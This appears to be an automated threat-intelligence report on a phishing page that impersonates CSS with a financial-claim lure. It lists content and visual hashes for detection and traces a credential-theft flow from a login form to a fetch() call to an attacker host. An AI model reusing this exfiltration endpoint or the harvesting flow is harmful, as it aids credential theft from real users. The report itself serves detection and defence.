Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1BCA41ADD72D9B0A91B977234D03F610AF27A2D81784CC410DA66E9C53C7984ED273FAA |
|
CONTENT
ssdeep
|
6144:lh+NNstexlJWqdAVAp3YIeKwstexlJWqdAVAp3YIeKO:KNst5IeNst5Ie1 |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
f73719080a227777 |
|
VISUAL
aHash
|
00ffe6ffffffffff |
|
VISUAL
dHash
|
fb100c0c00000001 |
|
VISUAL
wHash
|
00c2c6e7ffff0000 |
|
VISUAL
colorHash
|
070000001c0 |
|
VISUAL
cropResistant
|
130c4c000c000201,3f3febebef69ffff |
• Ameaça: Phishing
• Alvo: Clientes da CSS
• Método: Personificação com uma reclamação financeira
• Exfil: Desconhecido (devido à ofuscação)
• Indicadores: Incompatibilidade de domínio, reclamação financeira
• Risco: Alto
The attacker likely aims to steal user credentials by directing victims to a fake login page after they click the button. The obfuscation is likely used to hide the malicious code and make it harder to analyze.
The button could also trigger a download of malware. The download could be disguised as a document or application. This would compromise the user’s device.
User fills <input name=username> → submitForm() → fetch('http://atom-moustiques.com/ch/ui/app/auth/flow/mycss-login/ext/nachricht.html') → credentials sent
User fills <input name=username> → submitForm() → fetch('http://atom-moustiques.com/ch/ui/app/auth/flow/mycss-login/ext/nachricht.html') → credentials sent
ruxitagentjs_ICA2NVfgjqru_10281231207105659.jssendDatasubmitFormPages with identical visual appearance (based on perceptual hash)
Found 10 other scans for this domain